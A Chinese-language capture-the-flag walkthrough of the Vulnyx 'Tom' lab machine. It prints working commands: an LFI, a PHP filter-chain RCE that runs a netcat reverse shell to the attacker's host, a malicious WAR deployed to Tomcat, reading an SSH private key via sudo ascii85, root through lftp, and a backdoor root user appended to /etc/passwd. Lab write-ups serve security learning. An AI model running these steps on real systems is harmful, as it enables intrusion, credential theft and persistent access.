Vulnyx-Tom-Walkthrough

信息收集

服务探测

❯ export ip=192.168.60.219
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Scanning ports like it's my full-time job. Wait, it is.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.219:22
Open 192.168.60.219:80
Open 192.168.60.219:8080
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-01 14:29 CST
Initiating ARP Ping Scan at 14:29
Scanning 192.168.60.219 [1 port]
Completed ARP Ping Scan at 14:29, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:29
Completed Parallel DNS resolution of 1 host. at 14:29, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:29
Scanning 192.168.60.219 [3 ports]
Discovered open port 80/tcp on 192.168.60.219
Discovered open port 8080/tcp on 192.168.60.219
Discovered open port 22/tcp on 192.168.60.219
Completed SYN Stealth Scan at 14:29, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.60.219
Host is up, received arp-response (0.00046s latency).
Scanned at 2025-03-01 14:29:40 CST for 0s

PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 64
80/tcp   open  http       syn-ack ttl 64
8080/tcp open  http-proxy syn-ack ttl 64
MAC Address: 08:00:27:69:C1:7C (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

额外开放了一个8080端口

简单扫一下目录

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.219
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              zip,txt,php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 10701]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.60.219/javascript/]
/tomcat.php           (Status: 200) [Size: 0]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

LFI漏洞

猜测tomcat.php中含有LFI漏洞

模糊测试一下，得到参数filez

❯ wfuzz -c -u "http://$ip/tomcat.php?FUZZ=/etc/passwd" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt --hw 0
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.60.219/tomcat.php?FUZZ=/etc/passwd
Total requests: 207643

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000010381:   200        27 L     39 W       1441 Ch     "filez"
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 67.72655
Processed Requests: 75398
Filtered Requests: 75397
Requests/sec.: 1113.270

curl一下，拿到个用户nathan

❯ curl http://192.168.60.219/tomcat.php\?filez\=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
nathan:x:1000:1000:nathan,,,:/home/nathan:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
tomcat:x:1001:1001::/opt/tomcat:/bin/false

LFI2Rce

可以利用php过滤器得到网页源码

❯ curl "http://192.168.60.219/tomcat.php?filez=php://filter/convert.base64-encode/resource=tomcat.php"| base64 -d
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    44  100    44    0     0  14955      0 --:--:-- --:--:-- --:--:-- 22000
<?php include $_GET['filez']; ?>

那直接尝试反弹shell

HackMyVM-Medusa-Walkthrough | Pepster’Blog

❯ python3 php_filter_chain_generator.py --chain '<?=`$_GET[0]`?>'
[+] The following gadget chain will generate the following code : <?=`$_GET[0]`?> (base64 value: PD89YCRfR0VUWzBdYD8+)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp
❯ curl "http://192.168.60.219/tomcat.php?filez=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&0=nc%20192.168.60.100%204444%20-e%20%2Fbin%2Fsh"

监听端口

❯ pwncat-cs -lp 4444
[14:41:29] Welcome to pwncat 🐈!                            __main__.py:164
[14:41:52] received connection from 192.168.60.219:54444         bind.py:84
[14:41:53] 0.0.0.0:4444: upgrading from /usr/bin/dash to     manager.py:957
           /usr/bin/bash
           192.168.60.219:54444: registered new host w/ db   manager.py:957
(local) pwncat$
(remote) www-data@tom:/var/www/html$

敏感文件

拿到shell后，尝试找一下tomcat的用户配置文件

得到用户凭证tomcat:t0mL1k3$c4t$!!!

(remote) www-data@tom:/var/www/html$ cat /opt/tomcat/apache-tomcat-9.0.54/conf/tomcat-users.xml
<?xml version="1.0" encoding="UTF-8"?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
<!--
  By default, no user is included in the "manager-gui" role required
  to operate the "/manager/html" web application.  If you wish to use this app,
  you must define such a user - the username and password are arbitrary.

  Built-in Tomcat manager roles:
    - manager-gui    - allows access to the HTML GUI and the status pages
    - manager-script - allows access to the HTTP API and the status pages
    - manager-jmx    - allows access to the JMX proxy and the status pages
    - manager-status - allows access to the status pages only

  The users below are wrapped in a comment and are therefore ignored. If you
  wish to configure one or more of these users for use with the manager web
  application, do not forget to remove the <!.. ..> that surrounds them. You
  will also need to set the passwords to something appropriate.
-->
<!--
  <user username="admin" password="<must-be-changed>" roles="manager-gui"/>
  <user username="robot" password="<must-be-changed>" roles="manager-script"/>
-->
<!--
  The sample user and role entries below are intended for use with the
  examples web application. They are wrapped in a comment and thus are ignored
  when reading this file. If you wish to configure these users for use with the
  examples web application, do not forget to remove the <!.. ..> that surrounds
  them. You will also need to set the passwords to something appropriate.
-->
<!--
  <role rolename="tomcat"/>
  <role rolename="role1"/>
  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
  <user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
  <user username="role1" password="<must-be-changed>" roles="role1"/>
-->
<role rolename="admin-gui"/>
<role rolename="manager-script"/>
<user username="tomcat" password="t0mL1k3$c4t$!!!" roles="admin-gui,manager-script"/>
</tomcat-users>

用户提权

不过当我尝试登录的时候会403访问拒绝

提示需要修改context.xml文件

但我们没有权限去修改文件，从而进入管理页面

正常思路是拿到用户凭证登录manager后台上传war包可以rce，反弹一个tomcat用户的shell

但我们没法正常登录

不过尝试访问一下上传的接口，发现可以正常访问只不过没有指定文件路径

Tomcat - HackTricks

那我们利用curl的方式上传一个war包上去

war包可以在revshells中生成一个

❯ vim aa.war
❯ zip -r aa.war aa.jsp
  adding: aa.jsp (deflated 63%)
❯ file aa.war
aa.war: Zip archive data, at least v2.0 to extract, compression method=deflate
❯ curl --upload-file aa.war -u 'tomcat:t0mL1k3$c4t$!!!' "http://$ip:8080/manager/text/deploy?path=/aa"
OK - Desplegada aplicación en trayectoria de contexto [/aa]

---

这里也可以尝试利用MSFVenom来生成一个war包

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LPORT> -f war -o revshell.war

---

尝试反弹shell过来

拥有sudo权限可以执行ascii85

❯ curl http://192.168.60.219:8080/aa/aa.jsp
<html>
<head>
    <title>jrshell</title>
</head>
<body>
<form METHOD="POST" NAME="myform" ACTION="">
    <input TYPE="text" NAME="shell">
    <input TYPE="submit" VALUE="Send">
</form>
<pre>
port opened on Socket[addr=/192.168.60.100,port=4444,localport=54460]

</pre>
</body>
</html>%
-----------------------------------------
❯ pwncat-cs -lp 4444
[15:19:16] Welcome to pwncat 🐈!                           __main__.py:164
[15:19:19] received connection from 192.168.60.219:54460        bind.py:84
[15:19:19] 0.0.0.0:4444: upgrading from /usr/bin/dash to    manager.py:957
           /usr/bin/bash
[15:19:20] 192.168.60.219:54460: registered new host w/ db  manager.py:957
(local) pwncat$
(remote) tomcat@tom:/$ sudo -l
Matching Defaults entries for tomcat on tom:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tomcat may run the following commands on tom:
    (nathan) NOPASSWD: /usr/bin/ascii85

可以实现任意文件读取，读到私钥文件

(remote) tomcat@tom:/$ sudo -u nathan /usr/bin/ascii85 /home/nathan/.ssh/id_rsa | ascii85 --decode
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAxwsy7rdaOaFyP/BIhYzaFwqVekjOrjRO5OONkLT0EUo5eUG0
udkGBFoUZuVcZKiV3KLFFw84wJ7W3FhQViOyyi5LeG53xeGrK0IA6jWXKA0rC4z8
XWZg6JzN+/Q4Sz2vvJ14VLbElYxpl4KdkvS/WrJAZ8iZ4GDVqbSseZSXhiFQqJen
NCOTpxJIPIEkwRg6PptNag1vcWcbKIZ7GzB2ny2BHAPOJ47/IKMfCtRmpNzMyPVs
VtGhzczGFvFadm52xLcbiWUb4FqaNyfVnU+RY8Ph6rXoVLLncbaIU1hhyjyG/N/Z
U2dRHydd3S5RuvOAvfoWFRiUGps7ximt/Rmv7QIDAQABAoIBAAY5GmmOP/rnSkwn
dgz+316zDQNavWOC7SiI2Mc6cRsNSAi7fiwFVgPS0Sp6Z04aWz0ftavH5Q1Yqf0P
octfqFpb4i4svf/o01Ix6Rdpf4VYDA17ZfSBm+wJ4wLKmuv3TMRH5Bg58qF+V1rO
UaDjmAv84Lid8/mo7WU16eKPO8GMwPqbWbTtzmY9cm6LIdZP74XUKhDbPK6WizTl
4J8dba3vSBjMtkJOqeSVLyDIYXAwZpCzj6B9Yt9JhfOD4c5DCcPXDv/hJsvRrGYZ
UAoStJHOFIXMhi8i3fTKfpg+xnHMp83pzWL4ExDq09mKvJ6NoAzUb8g4WLs+lq+2
5RZBf50CgYEA6Nfio2RxqtvrimSEjISi+Zuafk89yFdi0mzTpLIxaBdYcFgpEXcf
F8M3NNB0dLU7f46cKojVfwff6ZR/3TvCYgSDlUQl2wRe0QlRY0SxRyHpvHOVhEWX
M5quiV0Zhgon7Zop7cGRHBfPOPgIENmjurO7mQ0+iaQFvVx5Cq1CpUMCgYEA2tbJ
tzBVadmJ2/SG+sHr1xe8Owynut0kq0E/dDWD5IF3G3/pWPxI5dW6aauBhqrPD17Q
qF+JhYQIcW6ZTfv46kloBNdoJiBEOScghKn8SfGPZFMjZDn0tcG8PBbu76s0AiNq
a2ksiR0Y1ENns4my5lelPJrjitOfn1vfw8b1aw8CgYAI6DFARNhgS9dfzOaRJYXC
fKRVTpyzbDxYhlc2RqbDL5lver/fbiofU5VqDMtXp5MmFwN8UQ2xtVBodAjMIrwV
2cxaymeUUD98SZn2bStG6FIzpkxC6hKVo8YndQtD6GGMokgWU0BEzdhceoh8dIbh
3nw/p5UL2N1rV/09XlFdVwKBgQCr36XtynhK+h/cMOEScNvZwzqC5h2WFbmHB2fe
zWkZPtVdM8kBqqNWX9ZYx+qi6eRWHhGjK+XGhzxaWpLtPMjyuVSI+OVDjHQIr0JK
73bGXIJSOTnCrgIT/mTojNp8QepHA6nBUok35zJpA8eeqrdnUc7lGoE7t5nWf0Hv
cYOu4QKBgA0YSqgmr4QZHyPGUjWo8MdsHgjAZuncsv2wiYKa/HwYqxwCQCRYnAnT
G7iUoWXqS1vgg8uSk9jX+XAxFyTgLaNFJR7K4F4eBeitTL/L/VRBmRai8aZYxlX3
s9wWdeSGfM9P5JN4JePzZXdjBT+KxbEEA29kVtipG1yByXKxpWtx
-----END RSA PRIVATE KEY-----

Root提权

利用私钥ssh连接一下

同时nathan也有sudo权限可以执行lftp

正常提权即可

❯ vi id_rsa
❯ ssh nathan@$ip -i id_rsa
The authenticity of host '192.168.60.219 (192.168.60.219)' can't be established.
ED25519 key fingerprint is SHA256:W4aCT/yYEsAYSFhsgZMp4TqApHolrSjUUwc93DqYd+c.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.219' (ED25519) to the list of known hosts.
Linux tom 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
nathan@tom:~$ cat user.txt
a9cdb9e26d1c627f008ae9c53385d146
nathan@tom:~$ sudo -l
Matching Defaults entries for nathan on tom:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User nathan may run the following commands on tom:
    (root) NOPASSWD: /usr/bin/lftp
nathan@tom:~$ sudo  /usr/bin/lftp -c '!/bin/sh'
# id
uid=0(root) gid=0(root) grupos=0(root)
# cat /root/root.txt
a2780681529284ec485c2d0e0a7f6831
# echo "primary:zSZ7Whrr8hgwY:0:0::/root:/bin/bash" >>/etc/passwd
# exit
nathan@tom:~$ su primary
Contraseña:
root@tom:/home/nathan# id
uid=0(root) gid=0(root) grupos=0(root)